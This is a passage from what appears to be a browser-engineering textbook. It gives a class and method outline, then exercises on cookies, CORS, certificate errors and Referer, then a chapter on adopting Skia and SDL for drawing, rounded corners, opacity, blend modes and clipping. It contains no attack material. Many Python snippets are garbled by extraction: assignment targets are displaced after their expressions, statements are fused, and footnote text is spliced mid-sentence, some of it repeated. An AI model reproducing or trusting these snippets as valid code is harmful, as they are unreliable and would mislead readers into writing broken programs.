def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class URL:
def __init__(url)
def request(top_level_url, payload)
def resolve(url)
def origin()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
EVENT_DISPATCH_CODE
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
def XMLHttpRequest_send(method, url, body)
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
def allowed_request(url)
COOKIE_JAR
if __name__ == "__main__"
The server has also grown since last chapter:
SESSIONS
def handle_connection(conx)
ENTRIES
LOGINS
def do_request(session, method, url, headers, body)
def form_decode(body)
def show_comments(session)
def login_form(session)
def do_login(session, params)
def not_found(url, method)
def add_entry(session, params)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
New inputs: Add support for hidden and password input elements. Hidden inputs shouldn’t show up or take up space, while password input elements should show their contents as stars instead of characters.
Certificate errors: When accessing an HTTPS page, the web
server can send an invalid certificate (badssl.com hosts various invalid
certificates you can use for testing). In this case, the
wrap_socket
function will raise a certificate error; Catch
these errors and show a warning message to the user. For all
other HTTPS pages draw a padlock (spelled
\N{lock}
) in the address bar.
Script access: Implement the document.cookie
JavaScript API. Reading this field should return a string containing
the cookie value and parameters, formatted similarly to the
Cookie
header. Writing to this field updates the cookie
value and parameters, just like receiving a Set-Cookie
header does. Also implement the HttpOnly
cookie parameter;
cookies with this parameter cannot
be read or written from JavaScript.
Cookie Expiration: Add support for cookie expiration. Cookie
expiration dates are set in the Set-Cookie
header, and can
be overwritten if the same cookie is set again with a later date. On the
server side, save the same expiration dates in the SESSIONS
variable and use it to delete old sessions to save memory.
CORS: Web servers can opt
in to allowing cross-origin XMLHttpRequest
s. The
way it works is that on cross-origin HTTP requests, the browser makes
the request and includes an Origin
header with the origin
of the requesting site; this request includes cookies for the target
origin. Per the same-origin policy, the browser then throws away the
response. But the server can send the
Access-Control-Allow-Origin
header, and if its value is
either the requesting origin or the special *
value, the
browser returns the response to the script. All requests made by your
browser will be what the CORS standard calls “simple requests”.
Referer: When your browser visits a web page, or when it
loads a CSS or JavaScript file, it sends a Referer
headerYep, spelled that
way. containing the URL it is coming from. Sites often
use this for analytics. Implement this in your browser. However, some
URLs contain personal data that they don’t want revealed to other
websites, so browsers support a Referrer-Policy
header,Yep, spelled that
way. which can contain values like
no-referrer
Yep, spelled that
way. (never send the Referer
header when
leaving this page) or same-origin
(only do so if navigating
to another page on the same origin). Implement those two values for
Referrer-Policy
.
Right now our browser can only draw colored rectangles and text—pretty boring! Real browsers support all kinds of visual effects that change how pixels and colors blend together. Let’s implement these effects using the Skia graphics library, and also see a bit of how Skia is implemented under the hood. That’ll also allow us to use surfaces for browser compositing to accelerate scrolling.
Before we get any further, we’ll need to upgrade our graphics system. While Tkinter is great for basic shapes and handling input, it lacks built-in support for many visual effects.That’s because Tk, the graphics library that Tkinter uses, dates from the early 90s, before high-performance graphics cards and GPUs became widespread. Implementing all details of the web’s many visual effects is fun, but it’s outside the scope of this book, so we need a new graphics library. Let’s use Skia, the library that Chromium uses. Unlike Tkinter, Skia doesn’t handle inputs or create graphical windows, so we’ll pair it with the SDL GUI library.
Start by installing Skia and SDL:
pip3 install skia-python pysdl2 pysdl2-dll
As elsewhere in this book, you may need to use pip
,
easy_install
, or python3 -m pip
instead of
pip3
as your installer, or use your IDE’s package
installer. If you’re on Linux, you’ll need to install additional
dependencies, like OpenGL and fontconfig. Also, you may not be able to
install pysdl2-dll
; if so, you’ll need to find SDL in your
system package manager instead. Consult the skia-python
and pysdl2
web pages for more details.
Once installed, remove the tkinter
imports from browser
and replace them with these:
import ctypes
import sdl2
import skia
If any of these imports fail, you probably need to check that Skia
and SDL were installed correctly. Note that the ctypes
module comes standard in Python; it is used to convert between Python
and C types.
The <canvas>
HTML element provides a JavaScript API that is similar to Skia and
Tkinter. Combined with WebGL,
it’s possible to implement basically all of SDL and Skia in JavaScript.
Alternatively, one can compile Skia to
WebAssembly
to do the same.
The main loop of the browser first needs some boilerplate to get SDL started:
if __name__ == "__main__":
import sys
sdl2.SDL_Init(sdl2.SDL_INIT_EVENTS)= Browser()
browser 1]))
browser.load(URL(sys.argv[# ...
Next, we need to create an SDL window, instead of a Tkinter window, inside the Browser, and set up Skia to draw to it. Here’s the SDL incantation to create a window:
class Browser:
def __init__(self):
self.sdl_window = sdl2.SDL_CreateWindow(b"Browser",
sdl2.SDL_WINDOWPOS_CENTERED, sdl2.SDL_WINDOWPOS_CENTERED, WIDTH, HEIGHT, sdl2.SDL_WINDOW_SHOWN)
To set up Skia to draw to this window, we also need to create a surface for it:In Skia and SDL, a surface is a representation of a graphics buffer into which you can draw pixels (bits representing colors). A surface may or may not be bound to the physical pixels on the screen via a window, and there can be many surfaces. A canvas is an API interface that allows you to draw into a surface with higher-level commands such as for rectangles or text. Our browser uses separate Skia and SDL surfaces for simplicity, but in a highly optimized browser, minimizing the number of surfaces is important for good performance.
class Browser:
def __init__(self):
self.root_surface = skia.Surface.MakeRaster(
skia.ImageInfo.Make(
WIDTH, HEIGHT,=skia.kRGBA_8888_ColorType,
ct=skia.kUnpremul_AlphaType)) at
Typically, we’ll draw to the Skia surface, and then once we’re done with it we’ll copy it to the SDL surface to display on the screen. This will be a little hairy, because we are moving data between two low-level libraries, but really it’s just copying pixels from one place to another.
First, get the sequence of bytes representing the Skia surface:
class Browser:
def draw(self):
# ...
# This makes an image interface to the Skia surface, but
# doesn't actually copy anything yet.
= self.root_surface.makeImageSnapshot()
skia_image = skia_image.tobytes() skia_bytes
Next, we need to copy the data to an SDL surface. This requires
telling SDL what order the pixels are stored in (which we specified to
be RGBA_8888
when constructing the surface) and on your
computer’s endianness:
class Browser:
def __init__(self):
if sdl2.SDL_BYTEORDER == sdl2.SDL_BIG_ENDIAN:
self.RED_MASK = 0xff000000
self.GREEN_MASK = 0x00ff0000
self.BLUE_MASK = 0x0000ff00
self.ALPHA_MASK = 0x000000ff
else:
self.RED_MASK = 0x000000ff
self.GREEN_MASK = 0x0000ff00
self.BLUE_MASK = 0x00ff0000
self.ALPHA_MASK = 0xff000000
The CreateRGBSurfaceFrom
method then wraps the data in
an SDL surface (this SDL surface does not copy the bytes): Note that since Skia and SDL
are C++ libraries, they are not always consistent with Python’s garbage
collection system. So the link between the output of
tobytes
and sdl_window
is not guaranteed to be
kept consistent when skia_bytes
is garbage collected.
Instead, the SDL surface will be pointing at a bogus piece of memory,
which will lead to memory corruption or a crash. The code here is
correct because all of these are local variables that are
garbage-collected together, but if not you need to be careful to keep
all of them alive at the same time.
class Browser:
def draw(self):
# ...
= 32 # Bits per pixel
depth = 4 * WIDTH # Bytes per row
pitch = sdl2.SDL_CreateRGBSurfaceFrom(
sdl_surface
skia_bytes, WIDTH, HEIGHT, depth, pitch,self.RED_MASK, self.GREEN_MASK,
self.BLUE_MASK, self.ALPHA_MASK)
Finally, we draw all this pixel data on the window itself by blitting
(copying) it from sdl_surface
to sdl_window
’s
surface:
class Browser:
def draw(self):
# ...
= sdl2.SDL_Rect(0, 0, WIDTH, HEIGHT)
rect = sdl2.SDL_GetWindowSurface(self.sdl_window)
window_surface # SDL_BlitSurface is what actually does the copy.
sdl2.SDL_BlitSurface(sdl_surface, rect, window_surface, rect)self.sdl_window) sdl2.SDL_UpdateWindowSurface(
Next, SDL doesn’t have a mainloop
or bind
method; we have to implement it ourselves:
if __name__ == "__main__":
# ...
= sdl2.SDL_Event()
event while True:
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == sdl2.SDL_QUIT:
browser.handle_quit()
sdl2.SDL_Quit()
sys.exit()# ...
The details of ctypes
and PollEvent
aren’t
too important here, but note that SDL_QUIT
is an event,
sent when the user closes the last open window. The
handle_quit
method it calls just cleans up the window
object:
class Browser:
def handle_quit(self):
self.sdl_window) sdl2.SDL_DestroyWindow(
We’ll also need to handle all of the other events in this loop—clicks, typing, and so on. The SDL syntax looks like this:
if __name__ == "__main__":
while True:
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
# ...
elif event.type == sdl2.SDL_MOUSEBUTTONUP:
browser.handle_click(event.button)elif event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RETURN:
browser.handle_enter()elif event.key.keysym.sym == sdl2.SDLK_DOWN:
browser.handle_down()elif event.type == sdl2.SDL_TEXTINPUT:
'utf8')) browser.handle_key(event.text.text.decode(
I’ve changed the signatures of the various event handler methods;
you’ll need to make analogous changes in Browser
where they
are defined. This loop replaces all of the bind
calls in
the Browser
constructor, which you can now remove.
SDL is most popular for making games. Their site lists a selection of books about game programming in SDL.
Now our browser is creating an SDL window and can draw to it via Skia. But most of the browser codebase is still using Tkinter drawing commands, which we now need to replace. Skia is a bit more verbose than Tkinter, so let’s abstract over some details with helper functions.Consult the Skia and skia-python documentation for more on the Skia API. First, a helper function to convert colors to Skia colors:
def parse_color(color):
if color == "white":
return skia.ColorWHITE
elif color == "lightblue":
return skia.ColorSetARGB(0xFF, 0xAD, 0xD8, 0xE6)
# ...
else:
return skia.ColorBLACK
You can add more “elif” blocks to support any other color names you use; modern browsers support quite a lot.
To draw a line, you use Skia’s Path
object:
class DrawLine:
def execute(self, canvas, scroll):
= skia.Path().moveTo(self.x1 - scroll, self.y1) \
path self.x2 - scroll, self.y2)
.lineTo(= skia.Paint(Color=parse_color(self.color))
paint
paint.setStyle(skia.Paint.kStroke_Style)self.thickness)
paint.setStrokeWidth( canvas.drawPath(path, paint)
To draw text, you use drawString
:
class DrawText:
def execute(self, canvas, scroll):
= skia.Paint(
paint =True, Color=parse_color(self.color))
AntiAlias= self.top - scroll - self.font.getMetrics().fAscent
baseline self.text, float(self.left), baseline,
canvas.drawString(self.font, paint)
Finally, for drawing rectangles you use drawRect
.
Filling in the rectangle is the default:
class DrawRect:
def execute(self, canvas, scroll):
= skia.Paint()
paint self.color))
paint.setColor(parse_color(self.rect.makeOffset(0, -scroll), paint) canvas.drawRect(
Here the rect
field is a Skia Rect
object,
which you can construct using MakeLTRB
(for “make
left-top-right-bottom”) or MakeXYWH
(for “make
x-y-width-height”):
class DrawRect:
def __init__(self, x1, y1, x2, y2, color):
self.rect = skia.Rect.MakeLTRB(x1, y1, x2, y2)
# ...
To draw just the outline, set the Style
parameter of the
Paint
to Stroke_Style
. Here “stroke” is a
standard term referring to drawing along the border of some shape; the
opposite is “fill”, meaning filling in the interior of the shape:
class DrawOutline:
def execute(self, canvas):
= skia.Paint()
paint
paint.setStyle(skia.Paint.kStroke_Style)self.thickness)
paint.setStrokeWidth(self.color))
paint.setColor(parse_color(self.rect.makeOffset(0, -scroll), paint) canvas.drawRect(
If you look at the details of these helper methods, you’ll see that
they all use a Skia Paint
object to describe a shape’s
borders and colors. We’ll be seeing a lot more features of
Paint
in this chapter.
While we’re here, let’s also add a rect
field to the
other drawing commands, replacing its top
,
left
, bottom
, and right
fields:You’ll probably
need some font changes in the browser UI, because Skia draws fonts a bit
differently from Tkinter. I had to adjust the y position of the
plus sign and less than signs to keep them centered in their boxes. Feel
free to adjust to make everything look good on your
system.
class DrawText:
def __init__(self, x1, y1, text, font, color):
# ...
self.rect = \
self.right, self.bottom)
skia.Rect.MakeLTRB(x1, y1,
class DrawLine:
def __init__(self, x1, y1, x2, y2, color, thickness):
# ...
self.rect = skia.Rect.MakeLTRB(x1, y1, x2, y2)
Since we’re replacing Tkinter with Skia, we are also replacing
tkinter.font
. In Skia, a font object has two pieces: a
Typeface
, which is a type family with a certain weight,
style, and width; and a Font
, which is a
Typeface
at a particular size. It’s the
Typeface
that contains data and caches, so that’s what we
need to cache:
def get_font(size, weight, style):
= (weight, style)
key if key not in FONTS:
if weight == "bold":
= skia.FontStyle.kBold_Weight
skia_weight else:
= skia.FontStyle.kNormal_Weight
skia_weight if style == "italic":
= skia.FontStyle.kItalic_Slant
skia_style else:
= skia.FontStyle.kUpright_Slant
skia_style = skia.FontStyle.kNormal_Width
skia_width = \
style_info
skia.FontStyle(skia_weight, skia_width, skia_style)= skia.Typeface('Arial', style_info)
font = font
FONTS[key] return skia.Font(FONTS[key], size)
Our browser also needs font metrics and measurements. In Skia, these
are provided by the measureText
and getMetrics
methods. Let’s start with measureText
replacing all calls
to measure
. For example, in the render
method
for a Tab
, we must do:
class InputLayout:
def paint(self, display_list):
if self.node.is_focused:
= self.x + self.font.measureText(text)
cx # ...
There are also measure
calls in DrawText
,
in the draw
method on Browser
, in the
text
method in BlockLayout
, and in the
layout
method in TextLayout
. Update all of
them to use measureText
.
Also, in the layout
method of LineLayout
and in DrawText
we make calls to the metrics
method on fonts. In Skia, this method is called getMetrics
,
and to get the ascent and descent we use
-font.getMetrics().fAscent
and
font.getMetrics().fDescent
Note the negative sign when accessing the ascent. In Skia, ascent and
descent are positive if they go downward and negative if they go upward,
so ascents will normally be negative, the opposite of Tkinter. There’s
no analog for the linespace
field that Tkinter provides,
but you can use descent minus ascent instead:
def linespace(font):
= font.getMetrics()
metrics return metrics.fDescent - metrics.fAscent
You should now be able to run the browser again. It should look and behave just as it did in previous chapters, and it’ll probably feel faster, because Skia and SDL are faster than Tkinter. This is one advantage of Skia: since it is also used by the Chromium browser, we know it has fast, built-in support for all of the shapes we might need. And if the transition felt easy—well, that’s one of the benefits to abstracting over the drawing backend using a display list!
Font rasterization is surprisingly deep, with techniques such as subpixel rendering and hinting used to make fonts look better on lower-resolution screens. These techniques are much less necessary on high-pixel-density screens, though. It’s likely that eventually, all screens will be high-density enough to retire these techniques.
Let’s reward ourselves for the big refactor with a simple feature
that Skia enables: rounded corners of a rectangle via the
border-radius
CSS property, like this:
<div style="border-radius: 10px; background: lightblue">
This is some example text.
</div>
Which looks like this:If you’re very observant, you may notice that the text here
protrudes past the background by just a handful of pixels. This is the
correct default behavior, and can be modified by the
overflow
CSS property, which we’ll see later this
chapter.
This is some example text.
Implementing border-radius
requires drawing a rounded
rectangle, so let’s add a new DrawRRect
command:
class DrawRRect:
def __init__(self, rect, radius, color):
self.rect = rect
self.rrect = skia.RRect.MakeRectXY(rect, radius, radius)
self.color = color
def execute(self, scroll, canvas):
= parse_color(self.color)
sk_color self.rrect,
canvas.drawRRect(=skia.Paint(Color=sk_color)) paint
Note that Skia supports RRect
s, or rounded rectangles,
natively, so we can just draw one right to a canvas. Now we can draw
these rounded rectangles for the background:
class BlockLayout:
def paint(self, display_list):
if not is_atomic:
if bgcolor != "transparent":
= float(
radius self.node.style.get("border-radius", "0px")[:-2])
display_list.append(DrawRRect(rect, radius, bgcolor))
Similar changes should be made to InputLayout
.
Implementing high-quality raster libraries is very interesting in its own right—check out Real-Time Rendering for more.There is also Computer Graphics: Principles and Practice, which incidentally I remember buying—this is Chris speaking—back in the days of my youth (1992 or so). At the time I didn’t get much further than rastering lines and polygons (in assembly language!). These days you can do the same and more with Skia and a few lines of Python. These days, it’s especially important to leverage GPUs when they’re available, and browsers often push the envelope. Browser teams typically include or work closely with raster library experts: Skia for Chromium and Core Graphics for WebKit, for example. Both of these libraries are used outside of the browser, too: Core Graphics in iOS and macOS, and Skia in Android.
Skia, like the Tkinter canvas we’ve been using until now, is a rasterization library: it converts shapes like rectangles and text into pixels. Before we move on to Skia’s advanced features, let’s talk about how rasterization works at a deeper level. This will help to understand how exactly those features work.
You probably already know that computer screens are a 2D array of pixels. Each pixel contains red, green and blue lights,Actually, some screens contain pixels besides red, green, and blue, including white, cyan, or yellow. Moreover, different screens can use slightly different reds, greens, or blues; professional color designers typically have to calibrate their screen to display colors accurately. For the rest of us, the software still communicates with the display in terms of standard red, green, and blue colors, and the display hardware converts to whatever pixels it uses. or color channels, that can shine with an intensity between 0 (off) and 1 (fully on). By mixing red, green, and blue, which is formally known as the sRGB color space, any color in that space’s gamut can be made.The sRGB color space dates back to CRT displays. New technologies like LCD, LED, and OLED can display more colors, so CSS now includes syntax for expressing these new colors. All color spaces have a limited gamut of expressible colors. In a rasterization library, a 2D array of pixels like this is called a surface.Sometimes they are called bitmaps or textures as well, but these words connote specific CPU or GPU technologies for implementing surfaces. Since modern devices have lots of pixels, surfaces require a lot of memory, and we’ll typically want to create as few as possible.
The job of a rasterization library is to determine the red, green, and blue intensity of each pixel on the screen, based on the shapes—lines, rectangles, text—that the application wants to display. The interface for drawing shapes onto a surface is called a canvas; both Tkinter and Skia had canvas APIs. In Skia, each surface has an associated canvas that draws to that surface.
Screens use red, green, and blue color channels to match the three types of cone cells in a human eye. We take it for granted, but color standards like CIELAB derive from attempts to reverse-engineer human vision. These cone cells vary between people: some have more or fewer (typically an inherited condition carried on the X chromosome). Moreover, different people have different ratios of cone types and those cone types use different protein structures that vary in the exact frequency of green, red, and blue that they respond to. The study of color thus combines software, hardware, chemistry, biology, and psychology.
Drawing shapes quickly is already a challenge, but with multiple shapes there’s an additional question: what color should the pixel be when two shapes overlap? So far, our browser has only handled opaque shapes,It also hasn’t considered subpixel geometry or anti-aliasing, which also rely on color mixing. and the answer has been simple: take the color of the top shape. But now we need more nuance.
Many objects in nature are partially transparent: frosted glass, clouds, or colored paper, for example. Looking through one, you see multiple colors blended together. That’s also why computer screens work: the red, green, and blue lights blend together and appear to our eyes as another color. Designers use this effectMostly. Some more advanced blending modes on the web are difficult, or perhaps impossible, in real-world physics. in overlays, shadows, and tooltips, so our browser needs to support color mixing.
Color mixing means we need to think carefully about the order of operations. For example, consider black text on an orange background, placed semi-transparently over a white background. The text is gray while the background is yellow-orange. That’s due to blending: the text and the background are both partially transparent and let through some of the underlying white:
But importantly, the text isn’t orange-gray: even though the text is partially transparent, none of the orange shines through. That’s because the order matters: the text is first blended with the background; since the text is opaque, its blended pixels are black and overwrite the orange background. Only then is this black-and-orange image blended with the white background. Doing the operations in a different order would lead to dark-orange or black text.
To handle this properly, browsers apply blending not to individual shapes but to a tree of stacking contexts. Conceptually, each stacking context is drawn onto its own surface, and then blended into its parent stacking context. Rastering a web page requires a bottom-up traversal of the tree of stacking contexts: to raster a stacking context you first need to raster its contents, including its child stacking contexts, and then the whole contents need to be blended together into the parent.
To match this use pattern, in Skia, surfaces form a stack. You can push a new surface on the stack, raster things to it, and then pop it off by blending it with surface below. When traversing the tree of stacking contexts, you push a new surface onto the stack every time you recurse into a new stacking context, and pop-and-blend every time you return from a child stacking context to its parent.
In real browsers, stacking contexts are formed by HTML elements with certain styles, up to any descendants that themselves have such styles. The full definition is actually quite complicated, so in this chapter we’ll simplify by treating every layout object as a stacking context.
Mostly, elements form
a stacking context because of CSS properties that have something to
do with layering (like z-index
) or visual effects (like
mix-blend-mode
). On the other hand, the
overflow
property, which can make an element scrollable,
does not induce a stacking context, which I think was a mistake.While we’re at it, perhaps
scrollable elements should also be a containing
block for descendants. Otherwise, a scrollable element can have
non-scrolling children via properties like position
. This
situation is very complicated to handle in real browsers.
The reason is that inside a modern browser, scrolling is done on the GPU
by offsetting two surfaces. Without a stacking context the browser might
(depending on the web page structure) have to move around multiple
independent surfaces with complex paint orders, in lockstep, to achieve
scrolling. Fixed- and sticky-positioned elements also form stacking
contexts because of their interaction with scrolling.
Color mixing happens when multiple page elements overlap. The easiest
way that happens in our browser is child elements overlapping their
parents, like this:There
are many more ways elements can overlap in a real browser: the
transform
property, position
ed elements,
negative margins, and so many more. But color mixing works the same way
each time.
<div style="background-color:orange">
Parent<div style="background-color:white;border-radius:5px">Child</div>
Parent</div>
It looks like this:
Parent
Right now, the white rectangle completely obscures part of the orange
one; the two colors don’t really need to “mix”, and in fact it kind of
looks like two orange rectangles instead of an orange rectangle with a
white one on top. Now let’s make the white child element
semi-transparent, so the colors have to mix. In CSS, that requires
adding an opacity
property with a value somewhere between 0
(completely transparent) and 1 (totally opaque). With 50% opacity on the
white child element, it looks like this:
Parent
Notice that instead of being pure white, the child element now has a light-orange background color, resulting from orange and white mixing. Let’s implement this in our browser.
The way to mix colors in Skia is to first create two surfaces, and
then draw one into the other. The most convenient way to do that is with
saveLayer
It’s called saveLayer
instead of
createSurface
because Skia doesn’t actually promise to
create a new surface, if it can optimize that away. So what you’re
really doing with saveLayer
is telling Skia that there is a
new conceptual layer (“piece of paper”) on the stack. Skia’s terminology
distinguishes between a layer and a surface for this reason as well, but
for our purposes it makes sense to assume that each new layer comes with
a surface. and restore
:
# draw parent
=skia.Paint(Alphaf=0.5))
canvas.saveLayer(paint# draw child
canvas.restore()
We first draw the parent, then create a new surface with
saveLayer
to draw the child into, and then when the
restore
call is made the paint
parameters
passed into saveLayer
are used to mix the colors in the two
surfaces together. Here we’re using the Alphaf
parameter,
which describes the opacity as a floating-point number from 0 to 1.
Note that saveLayer
and restore
are like a
pair of parentheses enclosing the child drawing operations. This means
our display list is no longer just a linear sequence of drawing
operations, but a tree. So in our display list, let’s represent
saveLayer
with a SaveLayer
command that takes
a sequence of other drawing commands as an argument:
class SaveLayer:
def __init__(self, sk_paint, children):
self.sk_paint = sk_paint
self.children = children
self.rect = skia.Rect.MakeEmpty()
for cmd in self.children:
self.rect.join(cmd.rect)
def execute(self, scroll, canvas):
=self.sk_paint)
canvas.saveLayer(paintfor cmd in self.children:
cmd.execute(scroll, canvas) canvas.restore()
Now let’s look at how we can add this to our existing
paint
method for BlockLayout
s. Right now, this
method draws a background and then recurses into its children, adding
each drawing command straight to the global display list. Let’s instead
add those drawing commands to a temporary list first:
class BlockLayout:
def paint(self, display_list):
= []
cmds # ...
if bgcolor != "transparent":
# ...
cmds.append(DrawRRect(rect, radius, bgcolor))
for child in self.children:
child.paint(cmds)# ...
display_list.extend(cmds)
Now, before we add our temporary command list to the overall
display list, we can use SaveLayer
to add transparency to
the whole element. I’m going to do this in a new
paint_visual_effects
method, because we’ll want to make the
same changes to all of our other layout objects:
class BlockLayout:
def paint(self, display_list):
# ...
= paint_visual_effects(self.node, cmds, rect)
cmds display_list.extend(cmds)
Inside paint_visual_effects
, we’ll parse the opacity
value and construct the appropriate SaveLayer
:
def paint_visual_effects(node, cmds, rect):
= float(node.style.get("opacity", "1.0"))
opacity
return [
=opacity), cmds)
SaveLayer(skia.Paint(Alphaf ]
Note that paint_visual_effects
receives a list of
commands and returns another list of commands. It’s just that the output
list is always a single SaveLayer
command that wraps the
original content—which makes sense, because first we need to draw the
commands to a surface, and then apply transparency to it when
blending into the parent.
This blog post gives a really nice visual overview of many of the same concepts explored in this chapter, plus way more content about how a library such as Skia might implement features like raster sampling of vector graphics for lines and text, and interpolation of surfaces when their pixel arrays don’t match resolution or orientation. I highly recommend it.
Now let’s pause and explore how opacity actually works under the hood. Skia, SDL, and many other color libraries account for opacity with a fourth alpha value for each pixel.The difference between opacity and alpha can be confusing. Think of opacity as a visual effect applied to content, but alpha as a part of content. Think of alpha as implementation technique for representing opacity. An alpha of 0 means the pixel is fully transparent (meaning, no matter what the colors are, you can’t see them anyway), and an alpha of 1 means a fully opaque.
When a pixel with alpha overlaps another pixel, the final color is a
mix of their two colors. How exactly the colors are mixed is defined by
Skia’s Paint
objects. Of course, Skia is pretty complex,
but we can sketch these paint operations in Python as methods on an
imaginary Pixel
class.
class Pixel:
def __init__(self, r, g, b, a):
self.r = r
self.g = g
self.b = b
self.a = a
When we apply a Paint
with an Alphaf
parameter, the first thing Skia does is add the requested opacity to
each pixel:
class Pixel:
def alphaf(self, opacity):
self.a = self.a * opacity
I want to emphasize that this code is not a part of our browser—I’m simply using Python code to illustrate what Skia is doing internally.
That Alphaf
operation applies to pixels in one surface.
But with SaveLayer
we will end up with two surfaces, with
all of their pixels aligned, and therefore we will need to combine, or
blend, corresponding pairs of pixels.
Here the terminology can get confusing: we imagine that the pixels “on top” are blending into the pixels “below”, so we call the top surface the source surface, with source pixels, and the bottom surface the destination surface, with destination pixels. When we combine them, there are lots of ways we could do it, but the default on the web is called “simple alpha compositing” or source-over compositing. In Python, the code to implement it looks like this:The formula for this code can be found here. Note that that page refers to premultiplied alpha colors, but Skia’s API does not use premultiplied representations, and the code below doesn’t either.
class Pixel:
def source_over(self, source):
self.a = 1 - (1 - source.a) * (1 - self.a)
if self.a == 0: return self
self.r = \
self.r * (1 - source.a) * self.a + \
(* source.a) / self.a
source.r self.g = \
self.g * (1 - source.a) * self.a + \
(* source.a) / self.a
source.g self.b = \
self.b * (1 - source.a) * self.a + \
(* source.a) / self.a source.b
Here the destination pixel self
is modified to blend in
the source pixel source
. The mathematical expressions for
the red, green, and blue color channels are identical, and basically
average the source and destination colors, weighted by alpha.For example, if the alpha of
the source pixel is 1, the result is just the source pixel color, and if
it is 0 the result is the backdrop pixel color. You might
imagine the overall operation of SaveLayer
with an
Alphaf
parameter as something like this:In reality, reading individual
pixels into memory to manipulate them like this is slow. So libraries
such as Skia don’t make it convenient to do so. (Skia canvases do have
peekPixels
and readPixels
methods that are
sometimes used, but not for this.)
for (x, y) in destination.coordinates():
source[x, y].alphaf(opacity) destination[x, y].source_over(source[x, y])
Source-over compositing is one way to combine two pixel values. But it’s not the only method—you could write literally any computation that combines two pixel values if you wanted. Two computations that produce interesting effects are traditionally called “multiply” and “difference” and use simple mathematical operations. “Multiply” multiplies the color values:
class Pixel:
def multiply(self, source):
self.r = self.r * source.r
self.g = self.g * source.g
self.b = self.b * source.b
And “difference” computes their absolute differences:
class Pixel:
def difference(self, source):
self.r = abs(self.r - source.r)
self.g = abs(self.g - source.g)
self.b = abs(self.b - source.b)
CSS supports these and many other blending modesMany of these blending modes
are common to
other graphics editing programs like Photoshop and GIMP. Some, like “dodge” and
“burn”, go back to analog photography, where photographers would
expose some parts of the image more than others to manipulate their
brightness. via the mix-blend-mode
property, like this:
<div style="background-color:orange">
Parent<div style="background-color:blue;mix-blend-mode:difference">
Child</div>
Parent</div>
This HTML will look like:
Parent
Here, when blue overlaps with orange, we see pink: blue has (red,
green, blue) color channels of (0, 0, 1)
, and orange has
(1, .65, 0)
, so with “difference” blending the resulting
pixel will be (1, 0.65, 1)
, which is pink. On a pixel
level, what’s happening is something like this:
for (x, y) in destination.coordinates():
source[x, y].alphaf(opacity)
source[x, y].difference(destination[x, y]) destination[x, y].source_over(source[x, y])
This looks weird, but conceptually it blends the destination into the source (which ignores alpha) and then draws the source over the destination (with alpha considered). In some sense, blending thus happens twice.
Skia supports the multiply and difference blend modes natively:
def parse_blend_mode(blend_mode_str):
if blend_mode_str == "multiply":
return skia.BlendMode.kMultiply
elif blend_mode_str == "difference":
return skia.BlendMode.kDifference
else:
return skia.BlendMode.kSrcOver
This makes adding support for blend modes to our browser as simple as
passing the BlendMode
parameter to the Paint
object:
def paint_visual_effects(node, cmds, rect):
# ...
= parse_blend_mode(node.style.get("mix-blend-mode"))
blend_mode
return [
=blend_mode), [
SaveLayer(skia.Paint(BlendMode=opacity), cmds),
SaveLayer(skia.Paint(Alphaf
]), ]
Note the order of operations here: we first apply
transparency, and then blend the result into the rest of the
page. If we switched the two SaveLayer
calls, so that we
first applied blending, there wouldn’t be anything to blend it into!
Alpha might seem intuitive, but it’s less obvious than you think:
see, for example, this history of
alpha written by its co-inventor (and co-founder of Pixar). And
there are several different implementation options. For example, many
graphics libraries, Skia included, multiply the color channels by the
opacity instead of allocating a whole color channel. This premultiplied
representation is generally more efficient; for example,
source_over
above had to divide by self.a
at
the end, because otherwise the result would be premultiplied. Using a
premultiplied representation throughout would save a division. Nor is it
obvious how alpha behaves when
resized.
The “multiply” and “difference” blend modes can seem kind of obscure, but blend modes are a flexible way to implement per-pixel operations. One common use case is clipping—intersecting a surface with a given shape. It’s called clipping because it’s like putting a second piece of paper (called a mask) over the first one, and then using scissors to cut along the mask’s edge.
There are all sorts of powerful methodsThe CSS clip-path
property lets specify a mask shape using a curve, while the mask
property lets you instead specify a image URL for the
mask. for clipping content on the web, but the most common
form involves the overflow
property. This property has lots
of possible values,For
example, overflow: scroll
adds scroll bars and makes an
element scrollable, while overflow: hidden
is similar to
but subtly different from overflow: clip
. but
let’s focus here on overflow: clip
, which cuts off contents
of an element that are outside the element’s bounds.
Usually, overflow: clip
is used with properties like
height
or rotate
which can make an element’s
children poke outside their parent. Our browser doesn’t support these,
but there is one edge case where overflow: clip
is
relevant: rounded corners. Consider this example:
<div
